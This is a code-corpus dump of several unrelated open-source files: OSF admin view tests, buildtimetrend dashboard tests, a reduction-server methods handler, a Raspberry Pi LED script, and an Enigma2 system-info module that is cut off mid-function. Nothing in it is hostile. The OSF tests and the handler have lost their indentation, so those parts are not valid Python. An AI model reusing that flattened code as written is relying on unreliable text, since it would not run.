qs = self.view.get_queryset()
nt.assert_equal(qs.count(), 1)
nt.assert_equal(qs[0]._id, self.spam_user._id)
class TestConfirmedHamUserList(SpamUserListMixin, AdminTestCase):
def setUp(self):
super(TestConfirmedHamUserList, self).setUp()
self.plain_view = views.UserKnownHamList
self.view = setup_log_view(self.plain_view(), self.request)
self.url = reverse('users:known-ham')
def test_get_queryset(self):
qs = self.view.get_queryset()
nt.assert_equal(qs.count(), 1)
nt.assert_equal(qs[0]._id, self.ham_user._id)
class TestRemove2Factor(AdminTestCase):
def setUp(self):
super(TestRemove2Factor, self).setUp()
self.user = AuthUserFactory()
self.request = RequestFactory().post('/fake_path')
self.view = views.User2FactorDeleteView
self.setup_view = setup_log_view(self.view(), self.request, guid=self.user._id)
self.url = reverse('users:remove2factor', kwargs={'guid': self.user._id})
@mock.patch('osf.models.user.OSFUser.delete_addon')
def test_remove_two_factor_get(self, mock_delete_addon):
self.setup_view.delete(self.request)
mock_delete_addon.assert_called_with('twofactor')
def test_integration_delete_two_factor(self):
user_addon = self.user.get_or_add_addon('twofactor')
nt.assert_not_equal(user_addon, None)
user_settings = self.user.get_addon('twofactor')
nt.assert_not_equal(user_settings, None)
count = AdminLogEntry.objects.count()
self.setup_view.delete(self.request)
post_addon = self.user.get_addon('twofactor')
nt.assert_equal(post_addon, None)
nt.assert_equal(AdminLogEntry.objects.count(), count + 1)
def test_no_user_permissions_raises_error(self):
guid = self.user._id
request = RequestFactory().get(self.url)
request.user = self.user
with self.assertRaises(PermissionDenied):
self.view.as_view()(request, guid=guid)
def test_correct_view_permissions(self):
guid = self.user._id
change_permission = Permission.objects.get(codename='change_osfuser')
self.user.user_permissions.add(change_permission)
self.user.save()
request = RequestFactory().get(self.url)
request.user = self.user
response = self.view.as_view()(request, guid=guid)
self.assertEqual(response.status_code, 200)
class TestUserWorkshopFormView(AdminTestCase):
def setUp(self):
self.user = AuthUserFactory()
self.auth = Auth(self.user)
self.view = views.UserWorkshopFormView()
self.node = ProjectFactory(creator=self.user)
self.mock_data = mock.patch.object(
csv,
'reader',
# parse data into the proper format handling None values as csv reader would
side_effect=(lambda values: [[item or '' for item in value] for value in values])
)
self.mock_data.start()
def tearDown(self):
self.mock_data.stop()
def _setup_workshop(self, date):
self.workshop_date = date
self.data = [
['none', 'date', 'none', 'none', 'none', 'email', 'none'],
[None, self.workshop_date.strftime('%m/%d/%y'), None, None, None, self.user.username, None],
]
self.user_exists_by_name_data = [
['number', 'date', 'location', 'topic', 'name', 'email', 'other'],
[None, self.workshop_date.strftime('%m/%d/%y'), None, None, self.user.fullname, '[email protected]', None],
]
self.user_not_found_data = [
['none', 'date', 'none', 'none', 'none', 'email', 'none'],
[None, self.workshop_date.strftime('%m/%d/%y'), None, None, None, '[email protected]', None],
]
def _add_log(self, date):
self.node.add_log('log_added', params={'project': self.node._id}, auth=self.auth, log_date=date, save=True)
def test_correct_number_of_columns_added(self):
self._setup_workshop(self.node.created)
added_columns = ['OSF ID', 'Logs Since Workshop', 'Nodes Created Since Workshop', 'Last Log Data']
result_csv = self.view.parse(self.data)
nt.assert_equal(len(self.data[0]) + len(added_columns), len(result_csv[0]))
def test_user_activity_day_of_workshop_and_before(self):
self._setup_workshop(self.node.created)
# add logs 0 to 48 hours back
for time_mod in range(9):
self._add_log(self.node.created - timedelta(hours=(time_mod * 6)))
result_csv = self.view.parse(self.data)
user_logs_since_workshop = result_csv[1][-3]
user_nodes_created_since_workshop = result_csv[1][-2]
nt.assert_equal(user_logs_since_workshop, 0)
nt.assert_equal(user_nodes_created_since_workshop, 0)
def test_user_activity_after_workshop(self):
self._setup_workshop(self.node.created - timedelta(hours=25))
self._add_log(self.node.created)
result_csv = self.view.parse(self.data)
user_logs_since_workshop = result_csv[1][-3]
user_nodes_created_since_workshop = result_csv[1][-2]
# 1 node created, 1 bookmarks collection created (new user), 1 node log
nt.assert_equal(user_logs_since_workshop, 3)
nt.assert_equal(user_nodes_created_since_workshop, 1)
# Test workshop 30 days ago
self._setup_workshop(self.node.created - timedelta(days=30))
result_csv = self.view.parse(self.data)
user_logs_since_workshop = result_csv[1][-3]
user_nodes_created_since_workshop = result_csv[1][-2]
nt.assert_equal(user_logs_since_workshop, 3)
nt.assert_equal(user_nodes_created_since_workshop, 1)
# Test workshop a year ago
self._setup_workshop(self.node.created - timedelta(days=365))
result_csv = self.view.parse(self.data)
user_logs_since_workshop = result_csv[1][-3]
user_nodes_created_since_workshop = result_csv[1][-2]
nt.assert_equal(user_logs_since_workshop, 3)
nt.assert_equal(user_nodes_created_since_workshop, 1)
# Regression test for OSF-8089
def test_utc_new_day(self):
node_date = self.node.created
date = datetime(node_date.year, node_date.month, node_date.day, 0, tzinfo=pytz.utc) + timedelta(days=1)
self._setup_workshop(date)
self._add_log(self.workshop_date + timedelta(hours=25))
result_csv = self.view.parse(self.data)
user_logs_since_workshop = result_csv[1][-3]
nt.assert_equal(user_logs_since_workshop, 1)
# Regression test for OSF-8089
def test_utc_new_day_plus_hour(self):
node_date = self.node.created
date = datetime(node_date.year, node_date.month, node_date.day, 0, tzinfo=pytz.utc) + timedelta(days=1, hours=1)
self._setup_workshop(date)
self._add_log(self.workshop_date + timedelta(hours=25))
result_csv = self.view.parse(self.data)
user_logs_since_workshop = result_csv[1][-3]
nt.assert_equal(user_logs_since_workshop, 1)
# Regression test for OSF-8089
def test_utc_new_day_minus_hour(self):
node_date = self.node.created
date = datetime(node_date.year, node_date.month, node_date.day, 0, tzinfo=pytz.utc) + timedelta(days=1) - timedelta(hours=1)
self._setup_workshop(date)
self._add_log(self.workshop_date + timedelta(hours=25))
result_csv = self.view.parse(self.data)
user_logs_since_workshop = result_csv[1][-3]
nt.assert_equal(user_logs_since_workshop, 1)
def test_user_osf_account_not_found(self):
self._setup_workshop(self.node.created)
result_csv = self.view.parse(self.user_not_found_data)
user_id = result_csv[1][-4]
last_log_date = result_csv[1][-1]
user_logs_since_workshop = result_csv[1][-3]
user_nodes_created_since_workshop = result_csv[1][-2]
nt.assert_equal(user_id, '')
nt.assert_equal(last_log_date, '')
nt.assert_equal(user_logs_since_workshop, 0)
nt.assert_equal(user_nodes_created_since_workshop, 0)
def test_user_found_by_name(self):
self._setup_workshop(self.node.created)
result_csv = self.view.parse(self.user_exists_by_name_data)
user_id = result_csv[1][-4]
last_log_date = result_csv[1][-1]
user_logs_since_workshop = result_csv[1][-3]
user_nodes_created_since_workshop = result_csv[1][-2]
nt.assert_equal(user_id, self.user._id)
nt.assert_equal(last_log_date, '')
nt.assert_equal(user_logs_since_workshop, 0)
nt.assert_equal(user_nodes_created_since_workshop, 0)
def test_form_valid(self):
request = RequestFactory().post('/fake_path')
data = [
['none', 'date', 'none', 'none', 'none', 'email', 'none'],
[None, '9/1/16', None, None, None, self.user.username, None],
]
uploaded = SimpleUploadedFile('test_name', bytes(csv.reader(data)), content_type='text/csv')
form = WorkshopForm(data={'document': uploaded})
form.is_valid()
form.cleaned_data['document'] = uploaded
setup_form_view(self.view, request, form)
class TestUserSearchView(AdminTestCase):
def setUp(self):
self.user_1 = AuthUserFactory(fullname='Broken Matt Hardy')
self.user_2 = AuthUserFactory(fullname='Jeff Hardy')
self.user_3 = AuthUserFactory(fullname='Reby Sky')
self.user_4 = AuthUserFactory(fullname='King Maxel Hardy')
self.user_2_alternate_email = '[email protected]'
self.user_2.emails.create(address=self.user_2_alternate_email)
self.user_2.save()
self.request = RequestFactory().get('/fake_path')
self.view = views.UserFormView()
self.view = setup_form_view(self.view, self.request, form=UserSearchForm())
def test_search_user_by_guid(self):
form_data = {
'guid': self.user_1.guids.first()._id
}
form = UserSearchForm(data=form_data)
nt.assert_true(form.is_valid())
response = self.view.form_valid(form)
nt.assert_equal(response.status_code, 302)
nt.assert_equal(self.view.success_url, '/users/{}/'.format(self.user_1.guids.first()._id))
def test_search_user_by_name(self):
form_data = {
'name': 'Hardy'
}
form = UserSearchForm(data=form_data)
nt.assert_true(form.is_valid())
response = self.view.form_valid(form)
nt.assert_equal(response.status_code, 302)
nt.assert_equal(self.view.success_url, '/users/search/Hardy/')
def test_search_user_by_name_with_punctuation(self):
form_data = {
'name': '~Dr. Sportello-Fay, PI'
}
form = UserSearchForm(data=form_data)
nt.assert_true(form.is_valid())
response = self.view.form_valid(form)
nt.assert_equal(response.status_code, 302)
nt.assert_equal(self.view.success_url, furl.quote('/users/search/~Dr. Sportello-Fay, PI/', safe='/.,~'))
def test_search_user_by_username(self):
form_data = {
'email': self.user_1.username
}
form = UserSearchForm(data=form_data)
nt.assert_true(form.is_valid())
response = self.view.form_valid(form)
nt.assert_equal(response.status_code, 302)
nt.assert_equal(self.view.success_url, '/users/{}/'.format(self.user_1.guids.first()._id))
def test_search_user_by_alternate_email(self):
form_data = {
'email': self.user_2_alternate_email
}
form = UserSearchForm(data=form_data)
nt.assert_true(form.is_valid())
response = self.view.form_valid(form)
nt.assert_equal(response.status_code, 302)
nt.assert_equal(self.view.success_url, '/users/{}/'.format(self.user_2.guids.first()._id))
def test_search_user_list(self):
view = views.UserSearchList()
view = setup_view(view, self.request)
view.kwargs = {'name': 'Hardy'}
results = view.get_queryset()
nt.assert_equal(len(results), 3)
for user in results:
nt.assert_in('Hardy', user.fullname)
def test_search_user_list_case_insensitive(self):
view = views.UserSearchList()
view = setup_view(view, self.request)
view.kwargs = {'name': 'hardy'}
results = view.get_queryset()
nt.assert_equal(len(results), 3)
for user in results:
nt.assert_in('Hardy', user.fullname)
class TestGetLinkView(AdminTestCase):
def test_get_user_confirmation_link(self):
user = UnconfirmedUserFactory()
request = RequestFactory().get('/fake_path')
view = views.GetUserConfirmationLink()
view = setup_view(view, request, guid=user._id)
user_token = user.email_verifications.keys()[0]
ideal_link_path = '/confirm/{}/{}/'.format(user._id, user_token)
link = view.get_link(user)
link_path = str(furl.furl(link).path)
nt.assert_equal(link_path, ideal_link_path)
def test_get_user_confirmation_link_with_expired_token(self):
user = UnconfirmedUserFactory()
request = RequestFactory().get('/fake_path')
view = views.GetUserConfirmationLink()
view = setup_view(view, request, guid=user._id)
old_user_token = user.email_verifications.keys()[0]
user.email_verifications[old_user_token]['expiration'] = datetime.utcnow().replace(tzinfo=pytz.utc) - timedelta(hours=24)
user.save()
link = view.get_link(user)
new_user_token = user.email_verifications.keys()[0]
link_path = str(furl.furl(link).path)
ideal_link_path = '/confirm/{}/{}/'.format(user._id, new_user_token)
nt.assert_equal(link_path, ideal_link_path)
def test_get_password_reset_link(self):
user = UnconfirmedUserFactory()
request = RequestFactory().get('/fake_path')
view = views.GetPasswordResetLink()
view = setup_view(view, request, guid=user._id)
link = view.get_link(user)
user_token = user.verification_key_v2.get('token')
nt.assert_is_not_none(user_token)
ideal_link_path = '/resetpassword/{}/{}'.format(user._id, user_token)
link_path = str(furl.furl(link).path)
nt.assert_equal(link_path, ideal_link_path)
def test_get_unclaimed_node_links(self):
project = ProjectFactory()
unregistered_contributor = project.add_unregistered_contributor(fullname='Brother Nero', email='[email protected]', auth=Auth(project.creator))
project.save()
request = RequestFactory().get('/fake_path')
view = views.GetUserClaimLinks()
view = setup_view(view, request, guid=unregistered_contributor._id)
links = view.get_claim_links(unregistered_contributor)
unclaimed_records = unregistered_contributor.unclaimed_records
nt.assert_equal(len(links), 1)
nt.assert_equal(len(links), len(unclaimed_records.keys()))
link = links[0]
nt.assert_in(project._id, link)
nt.assert_in(unregistered_contributor.unclaimed_records[project._id]['token'], link)
class TestUserReindex(AdminTestCase):
def setUp(self):
super(TestUserReindex, self).setUp()
self.request = RequestFactory().post('/fake_path')
self.user = AuthUserFactory()
@mock.patch('website.search.search.update_user')
def test_reindex_user_elastic(self, mock_reindex_elastic):
count = AdminLogEntry.objects.count()
view = views.UserReindexElastic()
view = setup_log_view(view, self.request, guid=self.user._id)
view.delete(self.request)
nt.assert_true(mock_reindex_elastic.called)
nt.assert_equal(AdminLogEntry.objects.count(), count + 1)
class TestUserMerge(AdminTestCase):
def setUp(self):
super(TestUserMerge, self).setUp()
self.request = RequestFactory().post('/fake_path')
@mock.patch('osf.models.user.OSFUser.merge_user')
def test_merge_user(self, mock_merge_user):
user = UserFactory()
user_merged = UserFactory()
view = views.UserMergeAccounts()
view = setup_log_view(view, self.request, guid=user._id)
invalid_form = MergeUserForm(data={'user_guid_to_be_merged': 'Not a valid Guid'})
valid_form = MergeUserForm(data={'user_guid_to_be_merged': user_merged._id})
nt.assert_false(invalid_form.is_valid())
nt.assert_true(valid_form.is_valid())
view.form_valid(valid_form)
nt.assert_true(mock_merge_user.called_with())
| apache-2.0 | -8,646,814,746,016,081,000 | 36.526854 | 152 | 0.638247 | false |
buildtimetrend/python-lib | buildtimetrend/test/dashboard_tests.py | 1 | 7348 | # vim: set expandtab sw=4 ts=4:
#
# Unit tests for dashboard related functions
#
# Copyright (C) 2014-2016 Dieter Adriaenssens <[email protected]>
#
# This file is part of buildtimetrend/python-lib
# <https://github.com/buildtimetrend/python-lib/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from buildtimetrend import dashboard
from buildtimetrend.settings import Settings
from buildtimetrend.tools import is_string
from buildtimetrend.tools import check_file
import buildtimetrend.keenio
import os
import unittest
import mock
from buildtimetrend.test import constants
class TestDashboard(unittest.TestCase):
"""Unit tests for dashboard related functions"""
@classmethod
def setUpClass(cls):
"""Set up test fixture."""
cls.project_info = Settings().get_project_info()
cls.maxDiff = None
@staticmethod
def tearDown():
"""Clean up after tests"""
if (check_file(constants.DASHBOARD_TEST_CONFIG_FILE)):
os.remove(constants.DASHBOARD_TEST_CONFIG_FILE)
def test_get_config_dict(self):
"""Test get_config_dict()"""
# error is thrown when extra parameter is not a dictionary
self.assertRaises(
TypeError,
dashboard.get_config_dict, "test/repo", "should_be_dict"
)
# empty configuration
self.assertDictEqual({}, dashboard.get_config_dict(""))
# repo name is added
self.assertDictEqual(
{'projectName': 'test/repo', 'repoName': 'test/repo'},
dashboard.get_config_dict("test/repo")
)
# add extra parameters
self.assertEqual(
{
'projectName': 'test/repo', 'repoName': 'test/repo',
'extra': 'value1', 'extra2': 'value2'
},
dashboard.get_config_dict(
"test/repo", {'extra': 'value1', 'extra2': 'value2'}
)
)
    # decorators are applied from the bottom up, see
# https://docs.python.org/dev/library/unittest.mock.html#nesting-patch-decorators
@mock.patch(
'buildtimetrend.keenio.get_dashboard_keen_config',
return_value={'projectId': '1234abcd'}
)
@mock.patch(
'buildtimetrend.dashboard.get_config_dict',
return_value={'projectName': 'test/repo'}
)
def test_get_config_string(
self, config_dict_func, keen_config_func
):
"""Test get_config_string()"""
self.assertEqual(
"var config = {'projectName': 'test/repo'};"
"\nvar keenConfig = {'projectId': '1234abcd'};",
dashboard.get_config_string("test/repo")
)
# function was last called with argument "test/repo"
args, kwargs = keen_config_func.call_args
self.assertEqual(args, ("test/repo",))
self.assertDictEqual(kwargs, {})
args, kwargs = config_dict_func.call_args
self.assertEqual(args, ("test/repo", None))
self.assertDictEqual(kwargs, {})
# call function with argument "test/repo2"
# and a dict with extra parameters
dashboard.get_config_string("test/repo2", {'extra': 'value'})
args, kwargs = keen_config_func.call_args
self.assertEqual(args, ("test/repo2",))
self.assertDictEqual(kwargs, {})
args, kwargs = config_dict_func.call_args
self.assertEqual(args, ("test/repo2", {'extra': 'value'}))
self.assertDictEqual(kwargs, {})
@mock.patch(
'buildtimetrend.dashboard.get_config_string',
return_value="var config = {'projectName': 'test/repo3'};\n"
"var keenConfig = {'projectId': '1234abcd'};"
)
def test_generate_config_file(self, get_cfg_str_func):
"""Test dashboard.generate_config_file()"""
# set config file path
Settings().add_setting(
"dashboard_configfile",
constants.DASHBOARD_TEST_CONFIG_FILE
)
# check if configfile exists
self.assertFalse(check_file(constants.DASHBOARD_TEST_CONFIG_FILE))
# generate config file with empty repo name
self.assertRaises(TypeError, dashboard.generate_config_file)
# generate config file with empty repo name
self.assertTrue(dashboard.generate_config_file(None))
self.assertTrue(check_file(constants.DASHBOARD_TEST_CONFIG_FILE))
# check if mock was called with correct parameters
args, kwargs = get_cfg_str_func.call_args
self.assertEqual(args, (None, ))
self.assertDictEqual(kwargs, {})
# generate config file
self.assertTrue(dashboard.generate_config_file("test/repo3"))
self.assertTrue(check_file(constants.DASHBOARD_TEST_CONFIG_FILE))
# check if mock was called with correct parameters
args, kwargs = get_cfg_str_func.call_args
self.assertEqual(args, ("test/repo3", ))
self.assertDictEqual(kwargs, {})
# test generated config file contents
with open(constants.DASHBOARD_TEST_CONFIG_FILE, 'r') as config_file:
self.assertEqual(
"var config = {'projectName': 'test/repo3'};\n",
next(config_file)
)
self.assertEqual(
"var keenConfig = {'projectId': '1234abcd'};",
next(config_file)
)
def test_generate_config_file_fails(self):
"""Test dashboard.generate_config_file() if creation fails"""
# set config file path
Settings().add_setting(
"dashboard_configfile",
constants.DASHBOARD_TEST_CONFIG_FILE
)
# check if configfile exists
self.assertFalse(check_file(constants.DASHBOARD_TEST_CONFIG_FILE))
# init mock
patcher = mock.patch(
'buildtimetrend.tools.check_file',
return_value=False
)
check_file_func = patcher.start()
# generation should return false
self.assertFalse(dashboard.generate_config_file("test/repo4"))
# check if mock was called with correct parameters
args, kwargs = check_file_func.call_args
self.assertEqual(
args,
(constants.DASHBOARD_TEST_CONFIG_FILE, )
)
self.assertDictEqual(kwargs, {})
patcher.stop()
def test_generate_config_file_ioerror(self):
"""
Test dashboard.generate_config_file()
        if creation fails because of a nonexistent path.
"""
# set config file path
Settings().add_setting(
"dashboard_configfile",
"build/unexisting_path/config_test.js"
)
# generation should return false
self.assertFalse(dashboard.generate_config_file("test/repo4"))
| agpl-3.0 | 7,381,473,342,080,567,000 | 33.824645 | 85 | 0.625885 | false |
ricleal/reductionServer | src/methods/handler.py | 1 | 2058 | '''
Created on Mar 13, 2014
@author: leal
'''
import config.config
import logging
from data.messages import Messages
import simplejson
from config.config import configParser
import ast
logger = logging.getLogger(__name__)
class MethodsHandler(object):
'''
classdocs
'''
def __init__(self):
'''
Constructor
'''
self._functionsFilename = configParser.get("General", "functions_specs_file")
self._instrumentName = configParser.get("General", "instrument_name")
def _getAllMethodsAsText(self):
with open(self._functionsFilename, 'r') as content_file:
content = content_file.read()
return content
def getAllMethods(self):
logger.debug("Getting methods...")
content = self._getAllMethodsAsText()
contentAsDic = None
try :
contentAsDic = ast.literal_eval(content)
except Exception, e:
message = "The remote specs file does not appear to have a json format."
logger.exception(message + str(e))
contentAsDic = Messages.error(message, str(e), self._functionsFilename );
return contentAsDic
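    # The specs file is expected to contain a Python dict literal; an
    # illustrative (assumed) layout would be:
    #   {'SomeReductionMethod': {'instruments': ['InstrumentA', 'InstrumentB'],
    #                            ...}, ...}
    # getMethodsForThisInstrument() below keeps only the entries whose
    # 'instruments' list contains the configured instrument name.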
def getMethodsForThisInstrument(self):
logger.debug("Getting methods...")
content = self._getAllMethodsAsText()
contentAsDic = None
res = {}
try :
contentAsDic = ast.literal_eval(content)
for k in contentAsDic.keys():
if isinstance(contentAsDic[k],dict):
thisEntry = contentAsDic[k]
if thisEntry.has_key('instruments'):
if self._instrumentName in thisEntry['instruments']:
res[k]=contentAsDic[k]
except Exception, e:
message = "The remote specs file does not appear to have a json format."
logger.exception(message + str(e))
res = Messages.error(message, str(e), self._functionsFilename );
return res
| gpl-3.0 | -8,053,861,058,212,530,000 | 28.414286 | 85 | 0.586006 | false |
sssstest/GameEditor | dejavu/driver.py | 1 | 1128 | #!/usr/bin/env python
from __future__ import print_function
class build_log():
def append(self, c):
print(c,end="")
def message(self, c):
print(c)
def percent(self, i):
print(i)
class error_printer():#error_stream
def __init__(self, log):
self.log=log
self.errors = 0
self.context = "<untitled>"
def set_context(self, c):
self.context = c
def count(self):
return self.errors
def error(self, e):
s = self.context + ":" + str(e.unexpected.row) + ":" + str(e.unexpected.col) + ": " + "error: unexpected '" +str(e.unexpected) + "'; expected "
if e.expected:
s += e.expected
else:
s += e.expected_token
s += "\n"
self.log.append(s)
self.log.append(self.parser.lexer.source.split("\n")[e.unexpected.row-1]+"\n")
self.log.append(" "*(e.unexpected.col-1)+"^\n")
self.errors+=1
		raise RuntimeError(s)
def error_string(self, e):
self.log.append(e)
self.errors+=1
	def progress(self, i, n=""):
		self.log.percent(i)
		if n:
			self.log.message(n)
def compile(target, source, log):
errors = error_printer(log)
return linker(source, getHostTriple(), errors).build(target)
| gpl-3.0 | -8,586,504,180,212,668,000 | 20.283019 | 145 | 0.631206 | false |
HybridF5/jacket | jacket/api/compute/openstack/compute/fping.py | 1 | 4989 | # Copyright 2011 Grid Dynamics
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import os
from oslo_config import cfg
import six
from webob import exc
from jacket.api.compute.openstack import common
from jacket.api.compute.openstack import extensions
from jacket.api.compute.openstack import wsgi
from jacket.compute import cloud
from jacket.i18n import _
from jacket.compute import utils
ALIAS = "os-fping"
authorize = extensions.os_compute_authorizer(ALIAS)
CONF = cfg.CONF
CONF.import_opt('fping_path', 'jacket.api.compute.openstack.compute.legacy_v2.contrib.'
'fping')
class FpingController(wsgi.Controller):
def __init__(self, network_api=None):
self.compute_api = cloud.API(skip_policy_check=True)
self.last_call = {}
def check_fping(self):
if not os.access(CONF.fping_path, os.X_OK):
raise exc.HTTPServiceUnavailable(
explanation=_("fping utility is not found."))
@staticmethod
def fping(ips):
fping_ret = utils.execute(CONF.fping_path, *ips,
check_exit_code=False)
if not fping_ret:
return set()
alive_ips = set()
for line in fping_ret[0].split("\n"):
ip = line.split(" ", 1)[0]
if "alive" in line:
alive_ips.add(ip)
return alive_ips
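    # Illustrative fping output parsed above (addresses are made up):
    #   "10.0.0.1 is alive"        -> "10.0.0.1" is added to alive_ips
    #   "10.0.0.2 is unreachable"  -> skipped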
@staticmethod
def _get_instance_ips(context, instance):
ret = []
for network in common.get_networks_for_instance(
context, instance).values():
all_ips = itertools.chain(network["ips"], network["floating_ips"])
ret += [ip["address"] for ip in all_ips]
return ret
@extensions.expected_errors(503)
def index(self, req):
context = req.environ["compute.context"]
search_opts = dict(deleted=False)
if "all_tenants" in req.GET:
authorize(context, action='all_tenants')
else:
authorize(context)
if context.project_id:
search_opts["project_id"] = context.project_id
else:
search_opts["user_id"] = context.user_id
self.check_fping()
include = req.GET.get("include", None)
if include:
include = set(include.split(","))
exclude = set()
else:
include = None
exclude = req.GET.get("exclude", None)
if exclude:
exclude = set(exclude.split(","))
else:
exclude = set()
instance_list = self.compute_api.get_all(
context, search_opts=search_opts, want_objects=True)
ip_list = []
instance_ips = {}
instance_projects = {}
for instance in instance_list:
uuid = instance.uuid
if uuid in exclude or (include is not None and
uuid not in include):
continue
ips = [str(ip) for ip in self._get_instance_ips(context, instance)]
instance_ips[uuid] = ips
instance_projects[uuid] = instance.project_id
ip_list += ips
alive_ips = self.fping(ip_list)
res = []
for instance_uuid, ips in six.iteritems(instance_ips):
res.append({
"id": instance_uuid,
"project_id": instance_projects[instance_uuid],
"alive": bool(set(ips) & alive_ips),
})
return {"servers": res}
@extensions.expected_errors((404, 503))
def show(self, req, id):
context = req.environ["compute.context"]
authorize(context)
self.check_fping()
instance = common.get_instance(self.compute_api, context, id)
ips = [str(ip) for ip in self._get_instance_ips(context, instance)]
alive_ips = self.fping(ips)
return {
"server": {
"id": instance.uuid,
"project_id": instance.project_id,
"alive": bool(set(ips) & alive_ips),
}
}
class Fping(extensions.V21APIExtensionBase):
"""Fping Management Extension."""
name = "Fping"
alias = ALIAS
version = 1
def get_resources(self):
res = extensions.ResourceExtension(ALIAS, FpingController())
return [res]
def get_controller_extensions(self):
return []
| apache-2.0 | -2,104,035,560,630,013,200 | 31.607843 | 87 | 0.585288 | false |
mueckl/raspberry_nagios_alert | scripts/red.led.py | 1 | 1090 | import RPi.GPIO as GPIO
import os.path
from time import sleep
import sys
# use P1 header pin numbering convention
#GPIO.setmode(GPIO.BOARD)
GPIO.setmode(GPIO.BCM)
pin=23
# Set up the GPIO channels - one input and one output
#GPIO.setup(11, GPIO.IN)
GPIO.setup(pin, GPIO.OUT)
# Input from pin 11
#input_value = GPIO.input(11)
# Output to pin 12
GPIO.output(pin, GPIO.LOW)
# The same script as above but using BCM GPIO 00..nn numbers
#GPIO.setmode(GPIO.BCM)
# Set up the GPIO channels - one input and one output
#GPIO.setup(17, GPIO.IN)
#GPIO.setup(18, GPIO.OUT)
# Input from pin 11
#input_value = GPIO.input(17)
# Output to pin 12
#GPIO.output(18, GPIO.HIGH)
fname="/dev/shm/red.led"
onoff=0
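# The control file is expected to hold one blink duration in seconds per line,
# for example (illustrative):
#   0.2
#   0.8
# Each value toggles the LED state and sleeps for that long; the file is
# re-read on every pass of the loop below.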
while True:
if os.path.isfile(fname):
with open(fname) as f:
content = f.readlines()
for number in content:
onoff=(onoff+1)%2;
if (onoff==1):
GPIO.output(pin, GPIO.HIGH)
else:
GPIO.output(pin, GPIO.LOW)
sleep(float(number))
GPIO.output(pin, GPIO.LOW)
else:
sleep(0.5)
| mit | -1,505,786,839,147,413,000 | 19.185185 | 60 | 0.640367 | false |
oostende/openblachole | lib/python/Components/About.py | 2 | 4196 | from boxbranding import getImageVersion, getMachineBuild
from sys import modules
import socket, fcntl, struct
def getVersionString():
return getImageVersion()
def getFlashDateString():
try:
f = open("/etc/install","r")
flashdate = f.read()
f.close()
return flashdate
except:
return _("unknown")
def getEnigmaVersionString():
return getImageVersion()
def getGStreamerVersionString():
import enigma
return enigma.getGStreamerVersionString()
def getKernelVersionString():
try:
f = open("/proc/version","r")
kernelversion = f.read().split(' ', 4)[2].split('-',2)[0]
f.close()
return kernelversion
except:
return _("unknown")
def getChipSetString():
try:
f = open('/proc/stb/info/chipset', 'r')
chipset = f.read()
f.close()
return str(chipset.lower().replace('\n','').replace('bcm','').replace('brcm',''))
except IOError:
return _("unavailable")
def getCPUSpeedString():
cpu_speed = 0
try:
file = open('/proc/cpuinfo', 'r')
lines = file.readlines()
file.close()
for x in lines:
splitted = x.split(': ')
if len(splitted) > 1:
splitted[1] = splitted[1].replace('\n','')
if splitted[0].startswith("cpu MHz"):
cpu_speed = float(splitted[1].split(' ')[0])
break
except IOError:
print "[About] getCPUSpeedString, /proc/cpuinfo not available"
if cpu_speed == 0:
if getMachineBuild() in ('hd51','hd52'):
import binascii
f = open('/sys/firmware/devicetree/base/cpus/cpu@0/clock-frequency', 'rb')
clockfrequency = f.read()
f.close()
cpu_speed = round(int(binascii.hexlify(clockfrequency), 16)/1000000,1)
else:
try: # Solo4K
file = open('/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq', 'r')
cpu_speed = float(file.read()) / 1000
file.close()
except IOError:
print "[About] getCPUSpeedString, /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq not available"
if cpu_speed > 0:
if cpu_speed >= 1000:
cpu_speed = "%s GHz" % str(round(cpu_speed/1000,1))
else:
cpu_speed = "%s MHz" % str(round(cpu_speed,1))
return cpu_speed
return _("unavailable")
def getCPUString():
system = _("unavailable")
try:
file = open('/proc/cpuinfo', 'r')
lines = file.readlines()
for x in lines:
splitted = x.split(': ')
if len(splitted) > 1:
splitted[1] = splitted[1].replace('\n','')
if splitted[0].startswith("system type"):
system = splitted[1].split(' ')[0]
elif splitted[0].startswith("model name"):
system = splitted[1].split(' ')[0]
file.close()
return system
except IOError:
return _("unavailable")
def getCpuCoresString():
try:
file = open('/proc/cpuinfo', 'r')
lines = file.readlines()
for x in lines:
splitted = x.split(': ')
if len(splitted) > 1:
splitted[1] = splitted[1].replace('\n','')
if splitted[0].startswith("processor"):
if int(splitted[1]) > 0:
cores = 2
else:
cores = 1
file.close()
return cores
except IOError:
return _("unavailable")
def _ifinfo(sock, addr, ifname):
iface = struct.pack('256s', ifname[:15])
info = fcntl.ioctl(sock.fileno(), addr, iface)
if addr == 0x8927:
return ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1].upper()
else:
return socket.inet_ntoa(info[20:24])
def getIfConfig(ifname):
ifreq = {'ifname': ifname}
infos = {}
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# offsets defined in /usr/include/linux/sockios.h on linux 2.6
infos['addr'] = 0x8915 # SIOCGIFADDR
infos['brdaddr'] = 0x8919 # SIOCGIFBRDADDR
infos['hwaddr'] = 0x8927 # SIOCSIFHWADDR
infos['netmask'] = 0x891b # SIOCGIFNETMASK
try:
for k,v in infos.items():
ifreq[k] = _ifinfo(sock, v, ifname)
except:
pass
sock.close()
return ifreq
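# Illustrative result for a configured interface (values are made up):
#   getIfConfig('eth0') -> {'ifname': 'eth0', 'addr': '192.168.1.10',
#                           'netmask': '255.255.255.0',
#                           'brdaddr': '192.168.1.255',
#                           'hwaddr': '00:11:22:33:44:55'}
# If an ioctl fails, the remaining keys are simply left out.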
def getIfTransferredData(ifname):
f = open('/proc/net/dev', 'r')
for line in f:
if ifname in line:
data = line.split('%s:' % ifname)[1].split()
rx_bytes, tx_bytes = (data[0], data[8])
f.close()
